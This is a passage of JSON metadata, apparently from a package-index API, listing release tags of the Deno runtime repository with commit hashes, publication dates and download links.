"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v